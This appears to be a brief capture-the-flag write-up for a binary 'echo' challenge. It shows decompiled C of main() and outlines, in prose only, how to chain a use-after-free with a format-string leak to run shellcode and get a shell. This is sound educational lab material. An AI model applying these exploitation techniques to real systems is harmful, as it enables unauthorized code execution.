FSB and UAF is used in this simple problem.
Let's have a look at it.
int __cdecl main(int argc, const char **argv, const char **envp)
{
int *v3; // rsi@1
_QWORD *v4; // rax@1
int v6; // [sp+Ch] [bp-24h]@1
_QWORD v7[4]; // [sp+10h] [bp-20h]@1
setvbuf(stdout, 0LL, 2, 0LL);
setvbuf(stdin, 0LL, 1, 0LL);
o = malloc(40uLL);
*((_QWORD *)o + 3) = greetings;
*((_QWORD *)o + 4) = byebye;
printf("hey, what's your name? : ", 0LL);
v3 = (int *)v7;
__isoc99_scanf("%24s", v7);
v4 = o;
*(_QWORD *)o = v7[0];
v4[1] = v7[1];
v4[2] = v7[2];
id = v7[0];
getchar();
func[0] = (__int64)echo1;
func_1_ = (__int64)echo2;
func_2_ = (__int64)echo3;
v6 = 0;
do
{
while ( 1 )
{
while ( 1 )
{
puts("\n- select echo type -");
puts("- 1. : BOF echo");
puts("- 2. : FSB echo");
puts("- 3. : UAF echo");
puts("- 4. : exit");
printf("> ", v3);
v3 = &v6;
__isoc99_scanf("%d", &v6);
getchar();
if ( (unsigned int)v6 > 3 )
break;
((void (__fastcall *)(const char *, int *))func[(unsigned __int64)(unsigned int)(v6 - 1)])("%d", &v6);
}
if ( v6 == 4 )
break;
puts("invalid menu");
}
cleanup();
printf("Are you sure you want to exit? (y/n)", &v6);
v6 = getchar();
}
while ( v6 != 121 );
puts("bye");
return 0;
}
When cleanup, it does free(o). At this time, if you press 4 to exit and cancel then, o is freed but it will be used in the following step when you press 2.
In echo3, it malloc(32) whose size is small enough to fetch the same block freed by cleanup. We can use it to modify the address of greetings(o+3*8).
Since the NX is disabled, our shellcode can be written in name, then we can leak it's address through FSB. After that, just overwrite greetings and trigger it to get a shell.